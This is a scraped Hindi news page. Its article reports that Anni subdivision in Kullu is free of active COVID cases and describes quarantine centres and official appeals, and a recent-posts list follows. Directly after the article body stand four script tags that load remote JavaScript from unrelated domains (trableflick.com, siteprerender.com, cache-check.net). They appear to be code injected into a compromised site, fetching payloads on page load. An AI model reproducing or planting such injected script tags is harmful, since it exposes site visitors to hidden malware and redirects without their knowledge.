Categories: हिमाचल

कुल्लूः आनी में 8 साल की बच्ची की रिपोर्ट हुई नेगेटिव

<p>जिला कुल्लू के एसडीएम चेत सिंह ने कहा कि आनी उपमंडल कोरोना मुक्त हो गया है। 8 साल की बच्ची की रिपोर्ट नेगेटिव आने के बाद उपमंडल में अब कोई भी सक्रिय कोरोना का मरीज नहीं है। अभी तक कुल तीन मामले कोरोना पॉजीटिव पाए गए थे और तीनों ही मरीज अब कोरोना नेगेटिव हो गए हैं। उपमंडल के कोरोना मुक्त होने पर प्रसन्नता व्यक्त करते हुए उन्होंने कहा कि साप्ताहिक तौर पर आनी और निरमंड क्षेत्र से कोरोना सेंपलिंग स्वास्थ्य विभाग की ओर से जारी है।</p>

<p>सेंपलिंग में कोरोना लक्षण वाले मरीजों और रेड जोन से आने वाले लोगों को प्राथमिकता दी जा रही है। उन्होंने कहा कि प्रशासन की ओर से नित्थर, जगातखाना और अरसु में तीन क्वारंटीन सेंटर बनाए गए हैं। इसमें करीब 25 लोगों को क्वारंटीन किया गया है। ये लोग क्वारंटीन नियमों का पालन कर रहे हैं और उम्मीद है कि जल्द ही ये लोग भी अपने घर जा सकेंगे।</p>

<p>एसडीएम चेत सिंह ने कहा होम और संस्थागत क्वारंटीन को मिलकार करीब 150 लोग उपमंडल में क्वारंटीन हैं। इनमें से रेड जोन से आने वाले लोगों की तादाद अधिक है। उन्होंने लोगों से अपील की है कि क्वारंटीन नियमों का पालन सरकार और प्रशासन के दिशा निर्देशों के हिसाब से करें ताकि अन्य लोगों को संक्रमण न फैल सके। यदि कोरोना का संक्रमण सामने आता है तो एहतियात बरतें। अफरा-तफरी का माहौल न बनाएं और प्रशासन का सहयोग करें।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1592993810694″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

राज्यपाल ने 11वीं हिमाचल पुलिस हाफ मैराथन को किया फ्लैग ऑफ, नशा मुक्त हिमाचल का संदेश

  Shimla: रविवार को हिमाचल प्रदेश पुलिस की ओर से 11वीं हाफ मैराथन का आयोजन…

19 mins ago

विक्रमादित्य सिंह ने खरगे से मुलाकात कर जताई पार्टी के प्रति निष्ठा

  New Delhi: हिमाचल प्रदेश के मंत्री विक्रमादित्य सिंह ने शनिवार शाम को कांग्रेस अध्यक्ष…

40 mins ago

शिमला में कैदी पुलिस को चकमा देकर फरार, रेप के आरोप में काट रहा था सजा

  Shimla: कंडा जेल में दुष्कर्म के आरोप में सजा काट रहा एक कैदी पुलिस…

2 hours ago

शिमला के दौलत सिंह पार्क में स्थापित होगी स्‍व.वीरभद्र सिंह की प्रतिमा

बैठक में मस्जिद विवाद में नगर निगम कर्मियों पर दर्ज हुए मामलों का पार्षदों ने…

2 hours ago

सरदार पटेल यूनिवर्सिटी के परिणाम पर छात्रों का रोष, जांच की उठी मांग

Dharamshala: बीए 2nd ईयर के परिणाम पर सवाल उठना शुरू हो गए हैं। एनएसयूआई का…

17 hours ago

डॉ. उदय बने धर्मशाला जोनल अस्पताल के नए चिकित्सा अधिकारी

  Dharamshala: भारतीय सेना से सेवानिवृत्त कैप्टन डॉ. उदय ने अब धर्मशाला जोनल अस्पताल में…

17 hours ago